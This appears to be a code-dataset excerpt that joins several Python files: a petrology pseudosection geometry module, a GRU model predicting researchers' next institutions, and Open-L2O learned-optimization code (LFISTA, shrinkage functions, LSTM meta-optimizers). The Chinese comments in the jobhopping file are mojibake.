return self.x[cix] + (ix - cix) * dx[cix], self.y[cix] + (ix - cix) * dy[cix]
else:
return self.x[0], self.y[0]
else:
return self.x[0], self.y[0]
class SectionBase:
"""Base class for PTsection, TXsection and PX section
"""
def __init__(self, **kwargs):
self.excess = kwargs.get('excess', set())
self.invpoints = {}
self.unilines = {}
self.dogmins = {}
def __repr__(self):
return '\n'.join(['{}'.format(type(self).__name__),
'Univariant lines: {}'.format(len(self.unilines)),
'Invariant points: {}'.format(len(self.invpoints)),
'{} range: {} {}'.format(self.x_var, *self.xrange),
'{} range: {} {}'.format(self.y_var, *self.yrange)])
@property
def ratio(self):
return (self.xrange[1] - self.xrange[0]) / (self.yrange[1] - self.yrange[0])
@property
def range_shapes(self):
# default p-t range boundary
bnd = [LineString([(self.xrange[0], self.yrange[0]),
(self.xrange[1], self.yrange[0])]),
LineString([(self.xrange[1], self.yrange[0]),
(self.xrange[1], self.yrange[1])]),
LineString([(self.xrange[1], self.yrange[1]),
(self.xrange[0], self.yrange[1])]),
LineString([(self.xrange[0], self.yrange[1]),
(self.xrange[0], self.yrange[0])])]
return bnd, next(polygonize(bnd))
def add_inv(self, id, inv):
if inv.manual:
inv.results = None
else: # temporary compatibility with 2.2.0
if not isinstance(inv.results, TCResultSet):
inv.results = TCResultSet([TCResult(float(x), float(y), variance=inv.variance,
data=r['data'], ptguess=r['ptguess'])
for r, x, y in zip(inv.results, inv.x, inv.y)])
self.invpoints[id] = inv
self.invpoints[id].id = id
def add_uni(self, id, uni):
if uni.manual:
uni.results = None
else: # temporary compatibility with 2.2.0
if not isinstance(uni.results, TCResultSet):
uni.results = TCResultSet([TCResult(float(x), float(y), variance=uni.variance,
data=r['data'], ptguess=r['ptguess'])
for r, x, y in zip(uni.results, uni._x, uni._y)])
self.unilines[id] = uni
self.unilines[id].id = id
def add_dogmin(self, id, dgm):
self.dogmins[id] = dgm
self.dogmins[id].id = id
def cleanup_data(self):
for id_uni, uni in self.unilines.items():
if not uni.manual:
keep = slice(max(uni.used.start - 1, 0), min(uni.used.stop + 1, len(uni._x)))
uni._x = uni._x[keep]
uni._y = uni._y[keep]
uni.results = uni.results[keep]
else:
uni.cmd = ''
uni.variance = 0
uni._x = np.array([])
uni._y = np.array([])
uni.results = [dict(data=None, ptguess=None)]
uni.output = 'User-defined'
uni.used = slice(0, 0)
uni.x = np.array([])
uni.y = np.array([])
self.trim_uni(id_uni)
def getidinv(self, inv=None):
'''Return id of either new or existing invariant point'''
ids = 0
# collect polymorphs identities
if inv is not None:
outs = [inv.out]
for poly in polymorphs:
if poly.issubset(inv.phases):
switched = inv.out.difference(poly).union(poly.difference(inv.out))
if switched:
outs.append(switched)
for iid, cinv in self.invpoints.items():
if inv is not None:
if cinv.phases == inv.phases:
if cinv.out in outs:
inv.out = cinv.out # switch to already used ??? Needed ???
return False, iid
ids = max(ids, iid)
return True, ids + 1
def getiduni(self, uni=None):
'''Return id of either new or existing univariant line'''
ids = 0
# collect polymorphs identities
if uni is not None:
outs = [uni.out]
for poly in polymorphs:
if poly.issubset(uni.phases):
outs.append(poly.difference(uni.out))
for uid, cuni in self.unilines.items():
if uni is not None:
if cuni.phases == uni.phases:
if cuni.out in outs:
uni.out = cuni.out # switch to already used ??? Needed ???
return False, uid
ids = max(ids, uid)
return True, ids + 1
def trim_uni(self, id):
uni = self.unilines[id]
if not uni.manual:
if uni.begin > 0:
p1 = Point(self.invpoints[uni.begin].x,
self.ratio * self.invpoints[uni.begin].y)
else:
p1 = Point(uni._x[0], self.ratio * uni._y[0])
if uni.end > 0:
p2 = Point(self.invpoints[uni.end].x,
self.ratio * self.invpoints[uni.end].y)
else:
p2 = Point(uni._x[-1], self.ratio * uni._y[-1])
#
xy = np.array([uni._x, self.ratio * uni._y]).T
line = LineString(xy)
# vertex distances
vdst = np.array([line.project(Point(*v)) for v in xy])
d1 = line.project(p1)
d2 = line.project(p2)
# switch if needed
if d1 > d2:
d1, d2 = d2, d1
uni.begin, uni.end = uni.end, uni.begin
# get slice of points to keep
uni.used = slice(np.flatnonzero(vdst >= d1)[0].item(),
np.flatnonzero(vdst <= d2)[-1].item() + 1)
# concatenate begin, keep, end
if uni.begin > 0:
x1, y1 = self.invpoints[uni.begin].x, self.invpoints[uni.begin].y
else:
x1, y1 = [], []
if uni.end > 0:
x2, y2 = self.invpoints[uni.end].x, self.invpoints[uni.end].y
else:
x2, y2 = [], []
if not uni.manual:
xx = uni._x[uni.used]
yy = uni._y[uni.used]
else:
xx, yy = [], []
# store trimmed
uni.x = np.hstack((x1, xx, x2))
uni.y = np.hstack((y1, yy, y2))
def create_shapes(self, tolerance=None):
def splitme(seg):
'''Recursive boundary splitter'''
s_seg = []
for _, l in lns:
if seg.intersects(l):
m = linemerge([seg, l])
if m.type == 'MultiLineString':
p = seg.intersection(l)
p_ok = l.interpolate(l.project(p)) # fit intersection to line
t_seg = LineString([Point(seg.coords[0]), p_ok])
if t_seg.is_valid:
s_seg.append(t_seg)
t_seg = LineString([p_ok, Point(seg.coords[-1])])
if t_seg.is_valid:
s_seg.append(t_seg)
break
if len(s_seg) == 2:
return splitme(s_seg[0]) + splitme(s_seg[1])
else:
return [seg]
# define bounds and area
bnd, area = self.range_shapes
lns = []
log = []
# trim univariant lines
for uni in self.unilines.values():
ln = area.intersection(uni.shape(ratio=self.ratio, tolerance=tolerance))
if ln.type == 'LineString' and not ln.is_empty:
lns.append((uni.id, ln))
if ln.type == 'MultiLineString':
for ln_part in ln:
if ln_part.type == 'LineString' and not ln_part.is_empty:
lns.append((uni.id, ln_part))
# split boundaries
edges = splitme(bnd[0]) + splitme(bnd[1]) + splitme(bnd[2]) + splitme(bnd[3])
# polygonize
polys = list(polygonize(edges + [l for _, l in lns]))
# create shapes
shapes = {}
unilists = {}
for ix, poly in enumerate(polys):
unilist = []
for uni_id, ln in lns:
if ln.relate_pattern(poly, '*1*F*****'):
unilist.append(uni_id)
phases = set.intersection(*(self.unilines[id].phases for id in unilist))
vd = [phases.symmetric_difference(self.unilines[id].phases) == self.unilines[id].out or not phases.symmetric_difference(self.unilines[id].phases) or phases.symmetric_difference(self.unilines[id].phases).union(self.unilines[id].out) in polymorphs for id in unilist]
if all(vd):
if frozenset(phases) in shapes:
# multivariant field crossed just by single univariant line
if len(unilist) == 1:
if self.unilines[unilist[0]].out.issubset(phases):
phases = phases.difference(self.unilines[unilist[0]].out)
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
elif len(unilists[frozenset(phases)]) == 1:
if self.unilines[unilists[frozenset(phases)][0]].out.issubset(phases):
orig_unilist = unilists[frozenset(phases)]
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
phases = phases.difference(self.unilines[orig_unilist[0]].out)
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = orig_unilist
else:
shapes[frozenset(phases)] = shapes[frozenset(phases)].union(poly).buffer(0.00001)
log.append('Area defined by unilines {} is self-intersecting with {}.'.format(' '.join([str(id) for id in unilist]), ' '.join([str(id) for id in unilists[frozenset(phases)]])))
unilists[frozenset(phases)] = list(set(unilists[frozenset(phases)] + unilist))
else:
shapes[frozenset(phases)] = poly
unilists[frozenset(phases)] = unilist
else:
log.append('Area defined by unilines {} is not valid field.'.format(' '.join([str(id) for id in unilist])))
return shapes, unilists, log
def show(self):
for ln in self.unilines.values():
plt.plot(ln.x, ln.y, 'k-')
for ln in self.invpoints.values():
plt.plot(ln.x, ln.y, 'ro')
plt.xlim(self.xrange)
plt.ylim(self.yrange)
plt.xlabel(self.x_var_label)
plt.xlabel(self.y_var_label)
plt.show()
@staticmethod
def read_file(projfile):
with gzip.open(str(projfile), 'rb') as stream:
data = pickle.load(stream)
return data
@staticmethod
def from_file(projfile):
with gzip.open(str(projfile), 'rb') as stream:
data = pickle.load(stream)
return data['section']
class PTsection(SectionBase):
"""P-T pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = kwargs.get('trange', (200., 1000.))
self.yrange = kwargs.get('prange', (0.1, 20.))
self.x_var = 'T'
self.x_var_label = 'Temperature [C]'
self.x_var_res = 0.01
self.y_var = 'p'
self.y_var_label = 'Pressure [kbar]'
self.y_var_res = 0.001
super(PTsection, self).__init__(**kwargs)
class TXsection(SectionBase):
"""T-X pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = kwargs.get('trange', (200., 1000.))
self.yrange = (0., 1.)
self.x_var = 'T'
self.x_var_label = 'Temperature [C]'
self.x_var_res = 0.01
self.y_var = 'C'
self.y_var_label = 'Composition'
self.y_var_res = 0.001
super(TXsection, self).__init__(**kwargs)
class PXsection(SectionBase):
"""P-X pseudosection class
"""
def __init__(self, **kwargs):
self.xrange = (0., 1.)
self.yrange = kwargs.get('prange', (0.1, 20.))
self.x_var = 'C'
self.x_var_label = 'Composition'
self.x_var_res = 0.001
self.y_var = 'p'
self.y_var_label = 'Pressure [kbar]'
self.y_var_res = 0.001
super(PXsection, self).__init__(**kwargs)
``` |
{
"source": "JohnyWang97/Bachelors-project",
"score": 3
} |
#### File: Bachelors-project/src/jobhopping.py
```python
import pickle
import os
import torch
import torch.nn as nn
import heapq
import numpy as np
from src.config import model_path
import torch.nn.functional as F
#่ฐ็จ่ฎก็ฎๆบGPU่ฟ่ก่ฎก็ฎ
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
#่ฎพ็ฝฎๆจกๅๅฏผๅ
ฅ่ทฏๅพ
data_path = os.path.join(model_path, 'jobhopping')
#ๅพช็ฏ็ฅ็ป็ฝ็ปๅๆฐ่ฎพ็ฝฎ
class GRUfn(nn.Sequential):
def __init__(self, input_size, hidden_size, output_size):
super(GRUfn, self).__init__()
self.hidden_size = hidden_size
self.input_size = input_size
self.sig = nn.Sigmoid()
self.cr = nn.GRU(input_size=input_size, hidden_size=hidden_size)
self.fn = nn.Linear(hidden_size, output_size)
self.fn2 = nn.Linear(hidden_size, output_size)
def forward(self, x, y=None, batch=256):
if y is not None:
x, y = self.cr(x, y)
else:
x, y = self.cr(x)
x = torch.nn.utils.rnn.pad_packed_sequence(x)
#ไบคๆข่พๅ
ฅ็ฉ้ตx็ฌฌไธๅ็ฌฌไบไธช็ปดๅบฆ
r = torch.transpose(x[0], 0, 1)
y = y.view(batch, self.hidden_size)
ind = x[1].view(batch, 1, 1)
ind = ind - 1
ind = ind.expand(-1, -1, self.hidden_size)
t = torch.gather(r, 1, ind)
t = t.view(batch, self.hidden_size)
t = self.fn(t)
y = self.fn2(y)
t = t + y
t = self.sig(t)
return t
class JobHopping:
def __init__(self):
self._id2name = {}
self._name2id = {}
self._model_data = torch.load(os.path.join(data_path, 'model'))
self._affi = self._model_data['affi_tensor']
with open(os.path.join(data_path, 'orgID2orgname'), 'rb') as file:
_data = pickle.load(file)
for i, v in enumerate(_data):
self._id2name[i] = v.split('+')[0]
self._name2id.setdefault(v.split('+')[0], i)
self._INPUT_DIM = 128
self._OUTPUT_DIM = len(self._id2name.keys())
self._model = GRUfn(self._INPUT_DIM, 512, self._OUTPUT_DIM)
self._model.load_state_dict(self._model_data['state_dict'])
def predict(self, name_squence, ntop=5):
name_squence = [x.lower() for x in name_squence]
name2id_squence = [self._name2id[name] for name in name_squence if name in self._name2id.keys()]
# if len(name_squence) != len(name2id_squence):
# return None
temp_squence = name2id_squence
name2id_squence = []
if len(temp_squence) != 0:
name2id_squence.append(temp_squence[0])
[name2id_squence.append(term) for index, term in enumerate(temp_squence) if index != 0 and term != temp_squence[index - 1]]
else:
return None
# ๅปๆ้ๅค็ฏ่ทฏ
name2id_squence = self._delete_ring(name2id_squence)
zb = self._id2PackedSequence(name2id_squence)
fout = self._model(zb, batch=1)
# softmax_fout = F.softmax(fout,1)
# ans = heapq.nlargest(ntop, enumerate(softmax_fout.data.numpy()[0]), key=lambda x:x[1])
ans = heapq.nlargest(ntop, enumerate(fout.data.numpy()[0]), key=lambda x:x[1])
ret = []
for id, p in ans:
ret.append({
'name': self._id2name[id],
'p': p,
})
#self._softmax(ret)
return ret
def _delete_ring(self,id_squence):
clear_squence = id_squence
itmes = 1000
while True:
res = self._getNumofCommonSubstr(clear_squence, clear_squence)
if res[1] < 2:
break
a = "_".join([str(ss) for ss in res[0]])
b = "_".join([str(ss) for ss in clear_squence])
temp = b
times = 1000
while times > 1:
if b.rfind(a) != -1:
temp = b
b = self._rreplace(b, a, "_", 1)
times -= 1
else:
break
clear_squence = [int(term) for term in temp.split("_") if term != ""]
# id_squence = [int(s) for s in clear_squence]
# clear_squence = id_squence
return clear_squence
def _getNumofCommonSubstr(self,str1, str2):
lstr1 = len(str1)
lstr2 = len(str2)
record = [[0 for i in range(lstr2 + 1)] for j in range(lstr1 + 1)] # ๅคไธไฝ
maxNum = 0 # ๆ้ฟๅน้
้ฟๅบฆ
p = 0 # ๅน้
็่ตทๅงไฝ
for i in range(lstr1):
for j in range(lstr2):
if str1[i] == str2[j] and abs(i - j) > maxNum:
# ็ธๅๅ็ดฏๅ
record[i + 1][j + 1] = record[i][j] + 1
if record[i + 1][j + 1] > maxNum:
# ่ทๅๆๅคงๅน้
้ฟๅบฆ
maxNum = record[i + 1][j + 1]
# ่ฎฐๅฝๆๅคงๅน้
้ฟๅบฆ็็ปๆญขไฝ็ฝฎ
p = i + 1
# return p - maxNum,p, maxNum
return str1[p - maxNum:p], maxNum
def _rreplace(self,st, old, new, *max):
count = len(st)
if max and str(max[0]).isdigit():
count = max[0]
return new.join(st.rsplit(old, count))
def _id2PackedSequence(self, affi_id):
# ่พๅ
ฅ็ๅฝข็ถๅฏไปฅๆฏ (TรBร*)ใT ๆฏๆ้ฟๅบๅ้ฟๅบฆ๏ผB ๆฏ batch size๏ผ* ไปฃ่กจไปปๆ็ปดๅบฆ (ๅฏไปฅๆฏ 0)ใๅฆๆ batch_first=True ็่ฏ๏ผ้ฃไน็ธๅบ็ input size ๅฐฑๆฏ (BรTร*)ใ
ret = torch.zeros(1, len(affi_id), self._INPUT_DIM)
indices = torch.tensor(affi_id, device='cpu', dtype=torch.long)
ret[0] = torch.index_select(self._affi, 0, indices)
return torch.nn.utils.rnn.pack_padded_sequence(ret, [len(affi_id)],batch_first=True)
def _softmax(self, affis):
# Softmax is a generalization of logistic function that "squashes"(maps) a vector of arbitrary real values to a vector of real values in the range (0, 1) that add up to 1.
s = sum(map(lambda x: np.exp(x['p']), affis))
for dict in affis:
dict['p'] = round(np.exp(dict['p'])/s, 2)
j = JobHopping()
print('็ปๆ')
print(j.predict(['university of oxford','university of california berkeley','university of cambridge']))
``` |
{
"source": "JohnZ03/Open-L2O",
"score": 3
} |
#### File: Open-L2O/Model_Base_L2O/data_preprocessing.py
```python
import os
import numpy as np
import tensorflow.compat.v2 as tf
# _SHUFFLE_BUFFER = 51200
def dataset_parser(value, A):
"""Parse an ImageNet record from a serialized string Tensor."""
# return value[:A.shape[0]], value[A.shape[0]:]
return value[:A.shape[0]], value
def process_record_dataset(dataset,
is_training,
batch_size,
shuffle_buffer,
drop_remainder=False,
A=None):
"""Given a Dataset with raw records, return an iterator over the records.
Args:
dataset: A Dataset representing raw records
is_training: A boolean denoting whether the input is for training.
batch_size: The number of samples per batch.
shuffle_buffer: The buffer size to use when shuffling records. A larger
value results in better randomness, but smaller values reduce startup time
and use less memory.
drop_remainder: A boolean indicates whether to drop the remainder of the
batches. If True, the batch dimension will be static.
Returns:
Dataset of labels ready for iteration.
"""
if is_training:
# Shuffles records before repeating to respect epoch boundaries.
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
# Repeats the dataset for the number of epochs to train.
dataset = dataset.repeat()
# Use a private thread pool and limit intra-op parallelism. Enable
# non-determinism only for training.
options = tf.data.Options()
options.experimental_threading.max_intra_op_parallelism = 1
options.experimental_threading.private_threadpool_size = 16
options.experimental_deterministic = False
dataset = dataset.with_options(options)
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
lambda x: dataset_parser(x, A),
batch_size=batch_size,
num_parallel_batches=2,
drop_remainder=drop_remainder))
dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return dataset
def input_fn(is_training,
data_dir,
batch_size,
task='sc',
input_context=None,
drop_remainder=False,
A=None,
filename=None):
"""Input function which provides batches for train or eval.
Args:
is_training: A boolean denoting whether the input is for training.
data_dir: The directory containing the input data.
batch_size: The number of samples per batch.
input_context: A `tf.distribute.InputContext` object passed in by
`tf.distribute.Strategy`.
drop_remainder: A boolean indicates whether to drop the remainder of the
batches. If True, the batch dimension will be static.
Returns:
A dataset that can be used for iteration.
"""
if filename is None:
if is_training:
# filename = task+'_train_data.npy'
filename = 'train_data.npy'
else:
# filename = task+'_val_data.npy'
filename = 'val_data.npy'
data = np.load(os.path.join(data_dir, filename), allow_pickle=True)
shuffle_buffer = 400000 if task == 'cs' else data.shape[0]
# dataset = tf.data.TFRecordDataset(os.path.join(data_dir, filename))
dataset = tf.data.Dataset.from_tensor_slices(data)
if input_context:
dataset = dataset.shard(input_context.num_input_pipelines,
input_context.input_pipeline_id)
dataset = dataset.cache()
return process_record_dataset(
dataset=dataset,
is_training=is_training,
batch_size=batch_size,
# shuffle_buffer=_SHUFFLE_BUFFER if task == 'sc' else 400000,
shuffle_buffer=shuffle_buffer,
drop_remainder=drop_remainder,
A=A)
```
#### File: Model_Base_L2O/models/lfista.py
```python
import numpy as np
from numpy import linalg as LA
import tensorflow.compat.v2 as tf
from tensorflow.compat.v2 import keras
from .utils import shrink_free
import math
class LfistaCell(keras.layers.Layer):
"""Lfista cell."""
def __init__(self,
A,
Wg,
Wm,
We,
theta,
layer_id,
name=None):
super(LfistaCell, self).__init__(name=name)
self._A = A.astype(np.float32)
self.Wg = Wg
self.Wm = Wm
self.We = We
self.theta = theta
self.layer_id = layer_id
self._M = self._A.shape[0]
self._N = self._A.shape[1]
def call(self, inputs):
# output = B * y
output = tf.matmul(inputs[:, :self._M], self.We, transpose_b=True)
# if the current layer is not the first layer, take the ouput of the
# last layer as the input.
if self.layer_id > 0:
inputs_ = inputs[:, -self._N:]
output += tf.matmul(inputs_, self.Wg, transpose_b=True)
if self.layer_id > 1:
prev_inputs_ = inputs[:, -self._N*2:-self._N]
output += tf.matmul(prev_inputs_, self.Wm, transpose_b=True)
output = shrink_free(output, self.theta)
return tf.concat([inputs, output], 1)
class Lfista(keras.Sequential):
"""Lfista model."""
def __init__(self,
A,
T,
lam,
share_W=False,
D=None,
name="Lfista"):
super(Lfista, self).__init__(name=name)
self._A = A.astype(np.float32)
self._T = int(T)
self._lam = lam
self.share_W = share_W
self._M = self._A.shape[0]
self._N = self._A.shape[1]
self._scale = 1.001 * np.linalg.norm(A, ord=2)**2
self._theta = (self._lam / self._scale).astype(np.float32)
self._B = (np.transpose(self._A) / self._scale).astype(np.float32)
_W = np.eye(self._N, dtype=np.float32) - np.matmul(self._B, self._A)
_tk = [1.0, 1.0]
self._mk = []
for i in range(self._T):
_tk.append((1 + math.sqrt(1 + 4*_tk[-1]**2.0)) / 2)
self._mk.append((_tk[-2] - 1) / _tk[-1])
self._Wg = [
tf.Variable(_W * (1 + self._mk[i]), trainable=True, name=name + "_Wg" + str(i + 1))
for i in range(1, self._T)
]
self._Wm = [
tf.Variable(- self._mk[i] * _W, trainable=True, name=name + "_Wm" + str(i + 1))
for i in range(1, self._T)
]
self.theta = [
tf.Variable(
self._theta, trainable=True, name=name + "_theta" + str(i + 1))
for i in range(self._T)
]
self._We = [
tf.Variable(self._B, trainable=True, name=name + "_We" + str(i + 1))
] * self._T
if D is not None:
self._D = D
self._W_D_constant = tf.Variable(self._D, trainable=False, name=name + "_W_D_constant")
self._W_D = tf.Variable(self._D, trainable=True, name=name + "_W_D")
else:
self._D = None
self._W_D = None
def create_cell(self, layer_id):
if layer_id != 0:
Wg = self._Wg[layer_id - 1]
Wm = self._Wm[layer_id - 1]
else:
Wg = None
Wm = None
if self._D is None:
w_d = self._W_D
F = 0
else:
F = self._D.shape[0]
if layer_id == self._T - 1:
w_d = self._W_D
else:
w_d = self._W_D_constant
We = self._We[layer_id]
cell = LfistaCell(self._A,
Wg,
Wm,
We,
self.theta[layer_id],
layer_id,
"Lfista_layer" + str(layer_id + 1))
self.add(cell)
```
#### File: Model_Base_L2O/models/utils.py
```python
import tensorflow.compat.v2 as tf
from tensorflow.compat.v2 import keras
import tensorflow_probability as tfp
def shrink(data, theta):
theta = keras.layers.ReLU()(theta)
return tf.sign(data) * keras.layers.ReLU()(tf.abs(data) - theta)
def shrink_free(data, theta):
return tf.sign(data) * keras.layers.ReLU()(tf.abs(data) - theta)
def shrink_lamp(r_, rvar_, lam_):
"""
Implementation of thresholding neuron in Learned AMP model.
"""
theta_ = tf.maximum(tf.sqrt(rvar_) * lam_, 0.0)
xh_ = tf.sign(r_) * tf.maximum(tf.abs(r_) - theta_, 0.0)
return xh_
def shrink_ss(inputs_, theta_, q, return_index=False):
"""
Special shrink that does not apply soft shrinkage to entries of top q%
magnitudes.
:inputs_: TODO
:thres_: TODO
:q: TODO
:returns: TODO
"""
abs_ = tf.abs(inputs_)
thres_ = tfp.stats.percentile(abs_, 100.0-q, axis=1, keepdims=True)
"""
Entries that are greater than thresholds and in the top q% simultnaneously
will be selected into the support, and thus will not be sent to the
shrinkage function.
"""
index_ = tf.logical_and(abs_ > theta_, abs_ > thres_)
index_ = tf.cast(index_, tf.float32)
"""Stop gradient at index_, considering it as constant."""
index_ = tf.stop_gradient(index_)
cindex_ = 1.0 - index_ # complementary index
output = (tf.multiply(index_, inputs_) +
shrink_free(tf.multiply(cindex_, inputs_), theta_ ))
if return_index:
return output, cindex_
else:
return output
```
#### File: Model_Free_L2O/L2O-DM and L2O-RNNProp/networks.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import sys
import dill as pickle
import numpy as np
import six
import sonnet as snt
import tensorflow as tf
import preprocess
def factory(net, net_options=(), net_path=None):
"""Network factory."""
net_class = getattr(sys.modules[__name__], net)
net_options = dict(net_options)
if net_path:
with open(net_path, "rb") as f:
net_options["initializer"] = pickle.load(f)
return net_class(**net_options)
def save(network, sess, filename=None):
"""Save the variables contained by a network to disk."""
to_save = collections.defaultdict(dict)
variables = snt.get_variables_in_module(network)
for v in variables:
split = v.name.split(":")[0].split("/")
module_name = split[-2]
variable_name = split[-1]
to_save[module_name][variable_name] = v.eval(sess)
if filename:
with open(filename, "wb") as f:
pickle.dump(to_save, f)
return to_save
@six.add_metaclass(abc.ABCMeta)
class Network(snt.RNNCore):
"""Base class for meta-optimizer networks."""
@abc.abstractmethod
def initial_state_for_inputs(self, inputs, **kwargs):
"""Initial state given inputs."""
pass
def _convert_to_initializer(initializer):
"""Returns a TensorFlow initializer.
* Corresponding TensorFlow initializer when the argument is a string (e.g.
"zeros" -> `tf.zeros_initializer`).
* `tf.constant_initializer` when the argument is a `numpy` `array`.
* Identity when the argument is a TensorFlow initializer.
Args:
initializer: `string`, `numpy` `array` or TensorFlow initializer.
Returns:
TensorFlow initializer.
"""
if isinstance(initializer, str):
return getattr(tf, initializer + "_initializer")(dtype=tf.float32)
elif isinstance(initializer, np.ndarray):
return tf.constant_initializer(initializer)
else:
return initializer
def _get_initializers(initializers, fields):
"""Produces a nn initialization `dict` (see Linear docs for a example).
Grabs initializers for relevant fields if the first argument is a `dict` or
reuses the same initializer for all fields otherwise. All initializers are
processed using `_convert_to_initializer`.
Args:
initializers: Initializer or <variable, initializer> dictionary.
fields: Fields nn is expecting for module initialization.
Returns:
nn initialization dictionary.
"""
result = {}
for f in fields:
if isinstance(initializers, dict):
if f in initializers:
# Variable-specific initializer.
result[f] = _convert_to_initializer(initializers[f])
else:
# Common initiliazer for all variables.
result[f] = _convert_to_initializer(initializers)
return result
def _get_layer_initializers(initializers, layer_name, fields):
"""Produces a nn initialization dictionary for a layer.
Calls `_get_initializers using initializers[layer_name]` if `layer_name` is a
valid key or using initializers otherwise (reuses initializers between
layers).
Args:
initializers: Initializer, <variable, initializer> dictionary,
<layer, initializer> dictionary.
layer_name: Layer name.
fields: Fields nn is expecting for module initialization.
Returns:
nn initialization dictionary.
"""
# No initializers specified.
if initializers is None:
return None
# Layer-specific initializer.
if isinstance(initializers, dict) and layer_name in initializers:
return _get_initializers(initializers[layer_name], fields)
return _get_initializers(initializers, fields)
class StandardDeepLSTM(Network):
"""LSTM layers with a Linear layer on top."""
def __init__(self, output_size, layers, preprocess_name="identity",
preprocess_options=None, scale=1.0, initializer=None,
name="deep_lstm", tanh_output=False):
"""Creates an instance of `StandardDeepLSTM`.
Args:
output_size: Output sizes of the final linear layer.
layers: Output sizes of LSTM layers.
preprocess_name: Gradient preprocessing class name (in `l2l.preprocess` or
tf modules). Default is `tf.identity`.
preprocess_options: Gradient preprocessing options.
scale: Gradient scaling (default is 1.0).
initializer: Variable initializer for linear layer. See `snt.Linear` and
`snt.LSTM` docs for more info. This parameter can be a string (e.g.
"zeros" will be converted to tf.zeros_initializer).
name: Module name.
"""
super(StandardDeepLSTM, self).__init__(name=name)
self._output_size = output_size
self._scale = scale
self._preprocess_name = preprocess_name
if preprocess_name == 'fc':
with tf.variable_scope(self._template.variable_scope):
init = _get_layer_initializers(initializer, "input_projection", ("w", "b"))
self._preprocess = snt.Linear(preprocess_options["dim"], name="input_projection", initializers=init)
elif hasattr(preprocess, preprocess_name):
preprocess_class = getattr(preprocess, preprocess_name)
self._preprocess = preprocess_class(initializer, **preprocess_options)
else:
self._preprocess = getattr(tf, preprocess_name)
with tf.variable_scope(self._template.variable_scope):
self._cores = []
for i, size in enumerate(layers, start=1):
name = "lstm_{}".format(i)
init = _get_layer_initializers(initializer, name,
("w_gates", "b_gates"))
self._cores.append(snt.LSTM(size, name=name, initializers=init))
self._rnn = snt.DeepRNN(self._cores, skip_connections=False,
name="deep_rnn")
init = _get_layer_initializers(initializer, "linear", ("w", "b"))
self._linear = snt.Linear(output_size, name="linear", initializers=init)
self.tanh_output = tanh_output
def _build(self, inputs, prev_state):
"""Connects the `StandardDeepLSTM` module into the graph.
Args:
inputs: 2D `Tensor` ([batch_size, input_size]).
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
# Adds preprocessing dimension and preprocess.
if self._preprocess_name == "fc":
inputs = tf.nn.elu(self._preprocess(inputs))
else:
inputs = self._preprocess(tf.expand_dims(inputs, -1))
# Incorporates preprocessing into data dimension.
inputs = tf.reshape(inputs, [inputs.get_shape().as_list()[0], -1])
output, next_state = self._rnn(inputs, prev_state)
final_output = self._linear(output)
if self.tanh_output:
return tf.nn.tanh(final_output) * self._scale, next_state
else:
return final_output * self._scale, next_state
def initial_state_for_inputs(self, inputs, **kwargs):
batch_size = inputs.get_shape().as_list()[0]
return self._rnn.initial_state(batch_size, **kwargs)
class CoordinateWiseDeepLSTM(StandardDeepLSTM):
"""Coordinate-wise `DeepLSTM`."""
def __init__(self, name="cw_deep_lstm", **kwargs):
"""Creates an instance of `CoordinateWiseDeepLSTM`.
Args:
name: Module name.
**kwargs: Additional `DeepLSTM` args.
"""
super(CoordinateWiseDeepLSTM, self).__init__(1, name=name, **kwargs)
def _reshape_inputs(self, inputs):
return tf.reshape(inputs, [-1, 1])
def _build(self, inputs, prev_state):
"""Connects the CoordinateWiseDeepLSTM module into the graph.
Args:
inputs: Arbitrarily shaped `Tensor`.
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
input_shape = inputs.get_shape().as_list()
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(CoordinateWiseDeepLSTM, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
# Recover original shape.
return tf.reshape(output, input_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
reshaped_inputs = self._reshape_inputs(inputs)
return super(CoordinateWiseDeepLSTM, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class RNNprop(StandardDeepLSTM):
def __init__(self, name="RNNprop", **kwargs):
super(RNNprop, self).__init__(1, name=name, **kwargs)
def _reshape_inputs(self, inputs):
return tf.reshape(inputs, [-1, 2])
def _build(self, m, g, prev_state):
output_shape = g.get_shape().as_list()
inputs = tf.concat([tf.expand_dims(m, -1), tf.expand_dims(g, -1)], axis=-1)
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(RNNprop, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
# Recover original shape.
return tf.reshape(output, output_shape), next_state
def initial_state_for_inputs(self, inputs, **kwargs):
reshaped_inputs = tf.reshape(inputs, [-1, 1])
return super(RNNprop, self).initial_state_for_inputs(
reshaped_inputs, **kwargs)
class KernelDeepLSTM(StandardDeepLSTM):
"""`DeepLSTM` for convolutional filters.
The inputs are assumed to be shaped as convolutional filters with an extra
preprocessing dimension ([kernel_w, kernel_h, n_input_channels,
n_output_channels]).
"""
def __init__(self, kernel_shape, name="kernel_deep_lstm", **kwargs):
"""Creates an instance of `KernelDeepLSTM`.
Args:
kernel_shape: Kernel shape (2D `tuple`).
name: Module name.
**kwargs: Additional `DeepLSTM` args.
"""
self._kernel_shape = kernel_shape
output_size = np.prod(kernel_shape)
super(KernelDeepLSTM, self).__init__(output_size, name=name, **kwargs)
def _reshape_inputs(self, inputs):
transposed_inputs = tf.transpose(inputs, perm=[2, 3, 0, 1])
return tf.reshape(transposed_inputs, [-1] + self._kernel_shape)
def _build(self, inputs, prev_state):
"""Connects the KernelDeepLSTM module into the graph.
Args:
inputs: 4D `Tensor` (convolutional filter).
prev_state: `DeepRNN` state.
Returns:
`Tensor` shaped as `inputs`.
"""
input_shape = inputs.get_shape().as_list()
reshaped_inputs = self._reshape_inputs(inputs)
build_fn = super(KernelDeepLSTM, self)._build
output, next_state = build_fn(reshaped_inputs, prev_state)
transposed_output = tf.transpose(output, [1, 0])
